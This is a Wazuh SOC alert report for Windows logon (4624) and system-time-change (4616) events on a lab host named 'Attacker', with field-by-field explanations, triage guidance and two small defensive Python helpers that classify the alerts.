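"""Triage helpers for Wazuh 'Windows logon success' (Event 4624) alerts.

Added example for this report; it is not SOCscribe or Wazuh code. SAMPLE_4624 is
constructed from the fields shown on this page; the verdict labels, the skew
threshold and the contrast case built with variant() are this example's own.
"""
import copy
import re
from datetime import datetime, timedelta, timezone

LOGON_TYPES = {2: "Interactive", 3: "Network", 4: "Batch", 5: "Service", 7: "Unlock",
               8: "NetworkCleartext", 9: "NewCredentials", 10: "RemoteInteractive",
               11: "CachedInteractive"}
BUILTIN_SERVICE_SIDS = {"S-1-5-18", "S-1-5-19", "S-1-5-20"}  # SYSTEM, LOCAL SERVICE, NETWORK SERVICE
SKEW_THRESHOLD = timedelta(minutes=5)  # assumption: a bigger manager/endpoint gap deserves a note

# Wazuh stamps '2025-04-24T22:32:06.532+0000'; Windows systemTime is '2025-04-20T01:55:30.0318323Z'.
TS_RE = re.compile(r"^(\d{4})-(\d{2})-(\d{2})T(\d{2}):(\d{2}):(\d{2})(?:\.(\d+))?(Z|[+-]\d{2}:?\d{2})$")


def parse_ts(value: str) -> datetime:
    """Parse either timestamp flavour into an aware datetime (7-digit fractions truncated to microseconds)."""
    m = TS_RE.match(value)
    if not m:
        raise ValueError(f"unrecognised timestamp: {value!r}")
    y, mo, d, h, mi, s, frac, tz = m.groups()
    micro = int((frac or "0")[:6].ljust(6, "0"))
    if tz == "Z":
        offset = timedelta(0)
    else:
        digits = tz[1:].replace(":", "")
        offset = timedelta(hours=int(digits[:2]), minutes=int(digits[2:]))
        if tz[0] == "-":
            offset = -offset
    return datetime(int(y), int(mo), int(d), int(h), int(mi), int(s), micro, tzinfo=timezone(offset))


def clock_skew(alert: dict) -> timedelta:
    """Manager timestamp minus the endpoint's systemTime (positive = event dated earlier than its arrival)."""
    return parse_ts(alert["timestamp"]) - parse_ts(alert["data"]["win"]["system"]["systemTime"])


def classify_logon(alert: dict) -> tuple:
    """Return (verdict, reason) for a 4624 alert from logonType, targetUserSid, processName and ipAddress."""
    ev = alert["data"]["win"]["eventdata"]
    ltype = int(ev["logonType"])
    proc = ev["processName"].replace("\\\\", "\\").lower()  # Wazuh doubles the backslashes
    src = ev.get("ipAddress", "-")  # absent or '-' for local logons, as in this report
    if ltype == 5 and ev["targetUserSid"] in BUILTIN_SERVICE_SIDS and proc.endswith("\\services.exe"):
        return "routine", "Service Control Manager started a service as a built-in account"
    if ltype == 5:
        return "review", "service logon for a non-built-in account: find the service (Event 4697 / 7045)"
    if ltype == 9:
        return "review", "NewCredentials logon (runas /netonly style), a common pass-the-hash footprint"
    if ltype in (3, 10) and src not in ("-", "127.0.0.1", "::1"):
        return "review", f"{LOGON_TYPES[ltype]} logon from {src}: check the source host and the account"
    return "review", f"{LOGON_TYPES.get(ltype, 'unknown')} logon: correlate with 4672 / 4688 on the host"


def triage(alert: dict) -> dict:
    verdict, reason = classify_logon(alert)
    skew = clock_skew(alert)
    notes = [reason]
    if abs(skew) > SKEW_THRESHOLD:
        notes.append(f"manager timestamp is {skew} after the endpoint's systemTime (clock skew or late "
                     "delivery): order events by eventRecordID, not by wall clock")
    return {"record": alert["data"]["win"]["system"]["eventRecordID"], "verdict": verdict,
            "skew_seconds": skew.total_seconds(), "notes": notes}


def variant(alert: dict, **eventdata) -> dict:
    # Deep-copy an alert and override eventdata fields, to build contrast cases.
    out = copy.deepcopy(alert)
    out["data"]["win"]["eventdata"].update(eventdata)
    return out


# Constructed from this report's fields (record 43726 on agent 'Attacker').
SAMPLE_4624 = {
    "timestamp": "2025-04-24T22:32:06.532+0000",
    "rule": {"id": "60106", "level": 3, "mitre": {"id": ["T1078"]}},
    "data": {"win": {
        "system": {"eventID": "4624", "systemTime": "2025-04-20T01:55:30.0318323Z", "eventRecordID": "43726"},
        "eventdata": {"subjectUserSid": "S-1-5-18", "subjectUserName": "ATTACKER$", "subjectLogonId": "0x3e7",
                      "targetUserSid": "S-1-5-18", "targetUserName": "SYSTEM", "targetDomainName": "NT AUTHORITY",
                      "targetLogonId": "0x3e7", "logonType": "5", "logonProcessName": "Advapi",
                      "authenticationPackageName": "Negotiate", "keyLength": "0", "processId": "0x304",
                      "processName": "C:\\\\Windows\\\\System32\\\\services.exe", "elevatedToken": "%%1842"},
    }},
}

if __name__ == "__main__":
    print(triage(SAMPLE_4624))
    # Constructed contrast case: a named user's network logon from another host (not from this report).
    print(triage(variant(SAMPLE_4624, logonType="3", targetUserSid="S-1-5-21-1-2-3-1001",
                         targetUserName="jdoe", ipAddress="192.168.6.50", processName="-")))
```

Run as a script it prints the verdict for the report's own record (routine, with a note that the manager stamped it four days after the endpoint did) and for the contrast case (review); in a pipeline you would feed it the alert documents straight from the Wazuh alerts index.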

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:06.641+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts
Same pattern as record 43726, 65 ms earlier: SYSTEM, Logon Type 5, services.exe, no network fields. Two services starting back to back under LocalSystem is one burst, not two incidents; identify the services (System log 7036) and move on unless one of them is new (4697 / 7045).

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:06.641+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  41
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
UK GPG 13 (Protective Monitoring) control mapping – same family as the PCI / NIST / HIPAA tags around it, useful for compliance reporting, not for triage.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533926.414353
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
ETW provider that wrote the event. Microsoft‑Windows‑Security‑Auditing is the Security log; what it records is only as complete as the host's audit policy.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
Fixed GUID of that provider (this value is always Security‑Auditing). Filter on it rather than on the display name when a decoder mangles names.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
Schema version of the event template. Newer versions add fields (4624, for example, gained Elevated Token and Virtual Account); parsers built for an older layout silently drop them.

data.win.system.level:  0
Event level. Security‑log events are always 0 (LogAlways): success versus failure lives in keywords / severityValue, not here.

data.win.system.task:  12544
Task category. 12544 = Logon, the audit subcategory 4624 belongs to; use it to group events by subcategory.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:30.0970475Z
Time the endpoint wrote the event on its own clock (UTC). Compare with timestamp above: the host says 2025‑04‑20 but the manager received it on 2025‑04‑24, so either the host clock was off or delivery was delayed – order events by eventRecordID, not by wall clock.

data.win.system.eventRecordID:  43730
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
PID of the process that logged the event. Security‑Auditing logon events are written by lsass.exe, so 792 is LSASS on this host – not the process named in eventdata.

data.win.system.threadID:  13300
Thread inside that process. Forensics only.

data.win.system.channel:  Security
Log the event lives in. Security depends on audit policy being enabled; Sysmon and PowerShell events arrive on their own channels.

data.win.system.computer:  Attacker
Hostname as the event writer saw it. Should match agent.name (it does here); a mismatch means forwarded events or a renamed host.

data.win.system.severityValue:  AUDIT_SUCCESS
Text severity. For the Security log this is AUDIT_SUCCESS or AUDIT_FAILURE; other channels use INFO / WARNING / ERROR. A successful audit is still a success for the attacker if the action was theirs.

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
Rendered message: the same eventdata fields plus Microsoft's explanatory text. Worth reading once because it expands the %%NNNN codes (Impersonation Level: Impersonation, Virtual Account: No, Elevated Token: Yes) and shows the empty network fields; for pivots, use the structured fields below.

data.win.eventdata.subjectUserSid:  S-1-5-18
SID of the account that requested the logon (the Subject). S‑1‑5‑18 is LocalSystem, so a system component asked for this session.

data.win.eventdata.subjectUserName:  ATTACKER$
Name of the requester. A trailing $ is a computer account – the host itself, which is what LocalSystem services show up as.

data.win.eventdata.subjectDomainName:  WORKGROUP
Domain of the requesting account. WORKGROUP means this host is not domain‑joined, so there is no DC‑side 4768/4769 to correlate against.

data.win.eventdata.subjectLogonId:  0x3e7
Logon session of the requester. 0x3E7 (999) is the permanent SYSTEM session that exists from boot and never logs off.

data.win.eventdata.targetUserSid:  S-1-5-18
SID of the account the new session was created for (the New Logon). S‑1‑5‑18 is the well‑known LocalSystem SID, so this is a system component, not a user.

data.win.eventdata.targetUserName:  SYSTEM
Account that was logged on. Read it together with logonType and processName to decide whether that is normal.

data.win.eventdata.targetDomainName:  NT AUTHORITY
Domain of the logged‑on account. NT AUTHORITY is the pseudo‑domain for built‑in accounts (SYSTEM, LOCAL SERVICE, NETWORK SERVICE).

data.win.eventdata.targetLogonId:  0x3e7
Logon ID of the new session – the pivot key for every 4672/4688/4634 that follows. Subject and target both 0x3E7 means the service was attached to the existing SYSTEM session rather than given a fresh one.

data.win.eventdata.logonType:  5
How the logon happened. 5 = Service: the Service Control Manager started a service under this account. Others to know: 2 interactive, 3 network (SMB, WinRM), 4 batch (scheduled task), 7 unlock, 9 NewCredentials (runas /netonly, a pass‑the‑hash footprint), 10 RemoteInteractive (RDP), 11 cached credentials.

data.win.eventdata.logonProcessName:  Advapi
Trusted logon process that made the request. Advapi is the LogonUser API path used by services, scheduled tasks and runas; User32 is console logon, NtLmSsp and Kerberos are network, Winlogon is the shell, Schannel is TLS client certificates.

data.win.eventdata.authenticationPackageName:  Negotiate
Authentication package. Negotiate picks Kerberos when it can and falls back to NTLM; NTLM showing up explicitly on a domain‑joined host is worth a second look.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
GUID that ties this logon to the KDC's 4769 on a domain controller. All zeros = no Kerberos ticket was involved (local or non‑Kerberos logon), so there is nothing to correlate.

data.win.eventdata.keyLength:  0
Length in bits of the NTLM session key. 128 is normal NTLM, 56 means legacy crypto, and 0 means no session key was requested – always the case for Kerberos and for local service logons like this one, so 0 here is not a downgrade.

data.win.eventdata.processId:  0x304
PID (hex) of the process that requested the logon: 0x304 = 772 decimal. Match it to processName, and to a 4688 if you need its parent.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
Image that requested the logon. services.exe (the Service Control Manager) with logon type 5 is the textbook service start; any other image asking for a SYSTEM logon is the thing to chase.

data.win.eventdata.impersonationLevel:  %%1833
Resource‑string index; the rendered message expands %%1833 to Impersonation. Impersonation lets the process act as the account on this host; Delegation would also let it reach remote systems as that account.

data.win.eventdata.virtualAccount:  %%1843
Resource‑string index; %%1843 expands to No in the message. Yes would mean a per‑service virtual account (NT SERVICE\<name>) instead of a shared built‑in one.

data.win.eventdata.targetLinkedLogonId:  0x0
Logon ID of the UAC split‑token twin session. 0x0 = no linked session, expected for SYSTEM and service accounts.

data.win.eventdata.elevatedToken:  %%1842
Resource‑string index; %%1842 expands to Yes in the message, so the new session holds a full administrative token. Expected for SYSTEM; for an ordinary user it means they logged on with admin rights.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

System time changed.

🧠 What happened? System time changed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:32:07.256+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -
What this alert actually shows: the clock moved from 01:56:00.2059997Z to 01:56:00.2070161Z, about 1 ms, changed by LOCAL SERVICE from svchost.exe – the Windows Time Service pattern the event's own text calls normal. The cases to chase are steps of minutes or more, steps backwards, or a named user / non‑svchost process in the Subject fields; those break the ordering of every later timestamp, so check them before trusting any timeline from this host.

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:07.256+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  System time changed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60132
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'time_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.gpg13:  ['1.3', '4.13']
UK GPG 13 (Protective Monitoring) control mapping – same family as the PCI / NIST / HIPAA tags around it, useful for compliance reporting, not for triage.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533927.421691
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
ETW provider that wrote the event. Microsoft‑Windows‑Security‑Auditing is the Security log; what it records is only as complete as the host's audit policy.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
Fixed GUID of that provider (this value is always Security‑Auditing). Filter on it rather than on the display name when a decoder mangles names.

data.win.system.eventID:  4616
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  1
Schema version of the event template. Newer versions add fields (4624, for example, gained Elevated Token and Virtual Account); parsers built for an older layout silently drop them.

data.win.system.level:  0
Event level. Security‑log events are always 0 (LogAlways): success versus failure lives in keywords / severityValue, not here.

data.win.system.task:  12288
Task category. 12288 = Security State Change, the audit subcategory 4616 belongs to; use it to group events by subcategory.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:56:00.2089499Z
Time the endpoint wrote the event on its own clock (UTC). Compare with timestamp above: the host says 2025‑04‑20 but the manager received it on 2025‑04‑24, so either the host clock was off or delivery was delayed – order events by eventRecordID, not by wall clock.

data.win.system.eventRecordID:  43745
Incremental log record number – handy for timeline order.

data.win.system.processID:  4
PID of the process that logged the event. 4 is the System process: the time‑change audit is raised in the kernel, while the eventdata processId below (0x1c48) is the svchost that actually set the clock.

data.win.system.threadID:  8000
Thread inside that process. Forensics only.

data.win.system.channel:  Security
Log the event lives in. Security depends on audit policy being enabled; Sysmon and PowerShell events arrive on their own channels.

data.win.system.computer:  Attacker
Hostname as the event writer saw it. Should match agent.name (it does here); a mismatch means forwarded events or a renamed host.

data.win.system.severityValue:  AUDIT_SUCCESS
Text severity. For the Security log this is AUDIT_SUCCESS or AUDIT_FAILURE; other channels use INFO / WARNING / ERROR. A successful audit is still a success for the attacker if the action was theirs.

data.win.system.message:  "The system time was changed. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Process Information: Process ID: 0x1c48 Name: C:\Windows\System32\svchost.exe Previous Time: 2025-04-20T01:56:00.205999700Z New Time: 2025-04-20T01:56:00.207016100Z This event is generated when the system time is changed. It is normal for the Windows Time Service, which runs with System privilege, to change the system time on a regular basis. Other system time changes may be indicative of attempts to tamper with the computer."
Rendered message: the same eventdata fields plus Microsoft's explanatory text, which states the triage rule for this event: the Windows Time Service changing the clock is normal, anything else is a tampering candidate. Note the Previous Time / New Time values here are 100 ns apart in resolution and about 1 ms apart in value.

data.win.eventdata.subjectUserSid:  S-1-5-19
SID of the account that changed the clock. S‑1‑5‑19 is LOCAL SERVICE, the account the Windows Time Service (W32Time) runs as.

data.win.eventdata.subjectUserName:  LOCAL SERVICE
Built‑in low‑privilege service account. A named user here would mean someone set the clock by hand.

data.win.eventdata.subjectDomainName:  NT AUTHORITY
Pseudo‑domain for built‑in accounts – not a user or domain account.

data.win.eventdata.subjectLogonId:  0x3e5
0x3E5 (997) is the permanent LOCAL SERVICE session, the counterpart of 0x3E7 for SYSTEM.

data.win.eventdata.previousTime:  2025-04-20T01:56:00.2059997Z
Clock value before the change (UTC, 100 ns resolution).

data.win.eventdata.newTime:  2025-04-20T01:56:00.2070161Z
Clock value after the change. Here the step is about 1 ms forward, which is an NTP correction; a jump of minutes or more, or a step backwards, is the tampering / anti‑forensics signal and breaks the ordering of every timestamp that follows.

data.win.eventdata.processId:  0x1c48
PID (hex) of the process that set the time: 0x1c48 = 7240 decimal.

data.win.eventdata.processName:  C:\\Windows\\System32\\svchost.exe
Image that set the time. svchost.exe hosting W32Time is the normal source; cmd.exe, powershell.exe or w32tm.exe run by a user, or an unknown binary, is what to chase.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions
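A check for the 4616 fields above, added here as an example (it is not SOCscribe or Wazuh code). It measures the step between previousTime and newTime and tests whether the Subject and the process match the Windows Time Service pattern (LOCAL SERVICE or SYSTEM, inside svchost.exe), so a 1 ms correction like the one in this report comes back as routine while a manual or backwards change is flagged with the reasons. SAMPLE_4616 is constructed from this report's fields; CONSTRUCTED_TAMPER (user jdoe setting the clock back two hours from cmd.exe) is a made‑up contrast case, and the five‑second step threshold is the example's own.

```python
"""Checks for Wazuh 'System time changed' (Event 4616) alerts.

Added example for this report; it is not SOCscribe or Wazuh code. SAMPLE_4616 is
constructed from the fields on this page and CONSTRUCTED_TAMPER is a made-up
contrast case; the step threshold and verdict labels are this example's own.
"""
from datetime import datetime, timedelta, timezone

TIME_SERVICE_SIDS = {"S-1-5-18", "S-1-5-19"}  # SYSTEM and LOCAL SERVICE, the accounts W32Time runs as
TIME_SERVICE_IMAGE = "svchost.exe"            # W32Time is an svchost-hosted service
STEP_THRESHOLD = timedelta(seconds=5)         # assumption: NTP corrections are milliseconds, steps are not


def parse_win_ts(value: str) -> datetime:
    """Windows writes seven fractional digits ('...00.2059997Z'); trim to microseconds for strptime."""
    head, frac = value.rstrip("Z").split(".")
    return datetime.strptime(f"{head}.{frac[:6]}", "%Y-%m-%dT%H:%M:%S.%f").replace(tzinfo=timezone.utc)


def assess_time_change(alert: dict) -> dict:
    """Size of the clock step plus every reason not to treat the change as the time service at work."""
    ev = alert["data"]["win"]["eventdata"]
    record = alert["data"]["win"]["system"]["eventRecordID"]
    delta = parse_win_ts(ev["newTime"]) - parse_win_ts(ev["previousTime"])
    image = ev["processName"].replace("\\\\", "\\").rsplit("\\", 1)[-1].lower()  # Wazuh doubles backslashes
    findings = []
    if abs(delta) > STEP_THRESHOLD:
        findings.append(f"clock stepped by {delta}: timestamps after record {record} no longer line up "
                        "with earlier ones")
    if ev["subjectUserSid"] not in TIME_SERVICE_SIDS:
        findings.append(f"changed by {ev['subjectDomainName']}\\{ev['subjectUserName']}, "
                        "not a time-service account")
    if image != TIME_SERVICE_IMAGE:
        findings.append(f"changed by {image}; the Windows Time Service runs inside svchost.exe")
    return {"record": record, "delta_seconds": delta.total_seconds(),
            "verdict": "review" if findings else "routine", "findings": findings}


# Constructed from this report's fields (record 43745 on agent 'Attacker').
SAMPLE_4616 = {
    "timestamp": "2025-04-24T22:32:07.256+0000",
    "rule": {"id": "60132", "level": 5},
    "data": {"win": {
        "system": {"eventID": "4616", "systemTime": "2025-04-20T01:56:00.2089499Z", "eventRecordID": "43745"},
        "eventdata": {"subjectUserSid": "S-1-5-19", "subjectUserName": "LOCAL SERVICE",
                      "subjectDomainName": "NT AUTHORITY", "subjectLogonId": "0x3e5",
                      "previousTime": "2025-04-20T01:56:00.2059997Z", "newTime": "2025-04-20T01:56:00.2070161Z",
                      "processId": "0x1c48", "processName": "C:\\\\Windows\\\\System32\\\\svchost.exe"},
    }},
}

# Constructed contrast case (not from this report): a local user sets the clock back two hours from a shell.
CONSTRUCTED_TAMPER = {
    "timestamp": "2025-04-24T22:40:00.000+0000",
    "rule": {"id": "60132", "level": 5},
    "data": {"win": {
        "system": {"eventID": "4616", "systemTime": "2025-04-24T20:40:00.0000000Z", "eventRecordID": "43999"},
        "eventdata": {"subjectUserSid": "S-1-5-21-1-2-3-1001", "subjectUserName": "jdoe",
                      "subjectDomainName": "ATTACKER", "subjectLogonId": "0x5a1b2",
                      "previousTime": "2025-04-24T22:39:59.9000000Z", "newTime": "2025-04-24T20:40:00.0000000Z",
                      "processId": "0x1f40", "processName": "C:\\\\Windows\\\\System32\\\\cmd.exe"},
    }},
}

if __name__ == "__main__":
    for alert in (SAMPLE_4616, CONSTRUCTED_TAMPER):
        print(assess_time_change(alert))
```

The svchost.exe test is a heuristic, not proof: it separates the routine W32Time case from a user or tool setting the clock, which is what this report needs, but code injected into a service host would pass it, so the step size and the Subject account carry the weight when they disagree with the image.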

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:07.416+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts
Same routine pattern (SYSTEM, Logon Type 5, services.exe, no network fields), but note the clock: this record's systemTime is 2025‑04‑24T22:31:03, four days after records 43726 and 43730 and only a minute before the manager timestamp, so the earlier two were delivered late and this one arrived live. Identify the service that started (System log 7036, or 4697 / 7045 if it was newly installed); the T1078 tag comes from rule 60106, not from anything specific in this event.

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:07.416+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  42
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
UK GPG 13 (Protective Monitoring) control mapping – same family as the PCI / NIST / HIPAA tags around it, useful for compliance reporting, not for triage.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533927.424894
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
ETW provider that wrote the event. Microsoft‑Windows‑Security‑Auditing is the Security log; what it records is only as complete as the host's audit policy.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
Fixed GUID of that provider (this value is always Security‑Auditing). Filter on it rather than on the display name when a decoder mangles names.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
Schema version of the event template. Newer versions add fields (4624, for example, gained Elevated Token and Virtual Account); parsers built for an older layout silently drop them.

data.win.system.level:  0
Event level. Security‑log events are always 0 (LogAlways): success versus failure lives in keywords / severityValue, not here.

data.win.system.task:  12544
Task category. 12544 = Logon, the audit subcategory 4624 belongs to; use it to group events by subcategory.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:03.5251845Z
Time the endpoint wrote the event on its own clock (UTC). Here it is about a minute before the manager timestamp, so this record arrived in near‑real time, unlike the 2025‑04‑20 records above that were received four days after the host wrote them.

data.win.system.eventRecordID:  43748
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
PID of the process that logged the event. Security‑Auditing logon events are written by lsass.exe, so 792 is LSASS on this host – not the process named in eventdata.

data.win.system.threadID:  13300
Thread inside that process. Forensics only.

data.win.system.channel:  Security
Log the event lives in. Security depends on audit policy being enabled; Sysmon and PowerShell events arrive on their own channels.

data.win.system.computer:  Attacker
Hostname as the event writer saw it. Should match agent.name (it does here); a mismatch means forwarded events or a renamed host.

data.win.system.severityValue:  AUDIT_SUCCESS
Text severity. For the Security log this is AUDIT_SUCCESS or AUDIT_FAILURE; other channels use INFO / WARNING / ERROR. A successful audit is still a success for the attacker if the action was theirs.

